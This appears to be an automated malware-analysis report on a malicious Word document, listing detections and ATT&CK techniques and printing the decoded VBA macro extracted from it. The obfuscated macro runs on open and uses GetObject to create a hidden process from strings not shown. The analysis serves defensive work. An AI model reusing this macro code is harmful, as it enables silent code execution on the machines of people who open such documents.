Verdict: MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. The macro utilizes a GetObject call, a common technique for executing arbitrary code or downloading payloads. The presence of legacy WordBasic auto-exec markers and the ClamAV detection further indicate malicious intent. The VBA script is heavily obfuscated, making it difficult to determine the exact payload or destination, hence the 'unknown family' classification.
Heuristics (7)

- ClamAV: Doc.Malware.Dsdu-6905405-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Dsdu-6905405-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12497 bytes |

SHA-256 of macros.bas: 769f1f010a6c9c664422459f2ed0d85c3bf85f735eb649126c536b48059a9847
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "V_AQxA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "QXBAAA"
Attribute VB_Base = "0{232B3040-6D07-46B7-8AEA-9D06B39D66BE}{2F1EA1D3-2399-4010-BF69-5157FE5CC004}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "oC4B4A"
Sub autoopen()
On Error Resume Next
If LQkACU = FBAAA_AQ Then
w4XkGAC = (207318623)
FU_A4A = (A14QUGAQ * CInt(407771253 _
+ Atn(222480772 * oAQDQAA)) + RUABxAAD + CDbl(L1kAAc - Sqr(bDkUAk / _
CBool(955581245 / 287618393) + SwDkDA - Rnd(sCUCAAA))) * 115001129 * 886426616)
U1DDxUxA = (939469626)
End If
If VBxQQc = h4BABw Then
qU14Ao = (281614625)
HXoZBcA = (txxwDk * CInt(148996833 _
+ Atn(435203762 * ABAwAD)) + hZAQBA + CDbl(pAAAAA1 - Sqr(YABAA_A / _
CBool(944893507 / 60178560) + FcBACoAA - Rnd(XAAUADQ))) * 146479080 * 568305737)
Ro4X1x = (489054753)
End If
If SAwDwU = TUkwAcC Then
UDAUwA = (545227970)
LAUAoZ = (PABBCCU * CInt(676242049 _
+ Atn(2004818 * GxAxcD)) + wokcGBx + CDbl(uAZ4CBU - Sqr(cAAAUw / _
CBool(25682111 / 541253005) + d1UAAA - Rnd(JAAAAAC))) * 783889166 * 759727341)
IACoGQc = (321608616)
End If
Set zo4BBcGA = GetObject(Z__ZACZ + QXBAAA.i4xkAXUA + tAAcxoGA)
If sXDADkk = kQ_AU__ Then
d_AGCA = (288765909)
UB1QUQ_ = (uADAZGG * CInt(6970405 _
+ Atn(137712537 * nDDDAwC4)) + BoDAA1 + CDbl(ICCXc4 - Sqr(QCAxCAAQ / _
CBool(735086908 / 300383593) + aX4oDwoA - Rnd(oU_Bc1A))) * 564481517 * 130008187)
LocAA1DA = (549184604)
End If
If pZGwAowG = JxXAcC Then
YAGQkAo = (114579851)
bAABAXD1 = (Xo_AoXUw * CInt(829280736 _
+ Atn(859915205 * V4AZAx)) + R1ABAUB4 + CDbl(MUAUk4 - Sqr(vAXG1BA / _
CBool(414967801 / 842908985) + qADAQ4AU - Rnd(ZADQAAQ_))) * 720686101 * 492679830)
Vk_BGx = (317047363)
End If
If NAwDUAAA = TQxBX1oC Then
XQwDBk = (823700352)
kABAcDQ = (OwDDBAQA * CInt(153520158 _
+ Atn(939920494 * QXwQ1Z)) + p4Aokk + CDbl(sAQUAAG4 - Sqr(JAQACow / _
CBool(214387552 / 382535454) + HGBwAx - Rnd(Kc__AA))) * 102946009 * 167549854)
NZABA1 = (119247067)
End If
zo4BBcGA.ShowWindow = 298336 - 298336
If o1QG4cQ = uD1AAcX Then
WBwkAXUo = (399550076)
LUCUA1 = (UA4_Ak * CInt(81554373 _
+ Atn(842863109 * fDAwAU)) + hBACUB + CDbl(UXkoAA - Sqr(vABD1x / _
CBool(653588024 / 352182117) + ocwxAAAx - Rnd(iA_xxAU))) * 881236961 * 720215043)
zAA1Bo = (152773677)
End If
If PDcBBAA = ockBZQBB Then
BQQxAAAC = (723241726)
iUAAGXAU = (rDAUc4D1 * CInt(727216091 _
+ Atn(526127557 * RkBQDA)) + lXXAk1 + CDbl(rB1ok1X - Sqr(PAAAAcQ / _
CBool(444628792 / 429440776) + nABDQG - Rnd(IX4UABA))) * 144383498 * 239351901)
BAAAAA = (608721218)
End If
GetObject(W1GCBQ + QXBAAA.N_BDAoG + JDAAQAAU). _
Create@ DXBQA1A + QXBAAA.dxxQBQZA + nAAAAA_ + QXBAAA.RAAwQQ + vAADQUAQ + QXBAAA.zADUcAQA + UAADwkAo, ZD41XACA, zo4BBcGA, WDQBQU
If EAADBZA = GACU1Ak Then
aAwDA4_A = (496748349)
wCUAAAxc = (JcAQAcA * CInt(242897286 _
+ Atn(402902910 * wABwwx)) + uQxAAQX + CDbl(wckkoUAA - Sqr(ZAADDCA / _
CBool(950826652 / 896583089) + K1QDAoXA - Rnd(NAC1AXAD))) * 657129219 * 241113497)
YxcA_AwB = (584162951)
End If
If zBGkU4 = uUXBBwAA Then
iAACAA = (260027090)
kc14BAo = (iAQQAA4 * CInt(167038775 _
+ Atn(674351520 * mAA_xUG)) + FAoBA4 + CDbl(FA1cABB - Sqr(pAcDBAB / _
CBool(294797125 / 604420666) + rBB4Ao_A - Rnd(bBUxAxUB))) * 411144586 * 392351117)
TAUDGQ = (867134419)
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/8fb5ae5fedc04c0e888d92c41ffbf226.bin
' ===============================================================================
' Module streams:
' Macros/VBA/V_AQxA - 1104 bytes
' Macros/VBA/QXBAAA - 1157 bytes
' Macros/VBA/oC4B4A - 579
```

... (truncated)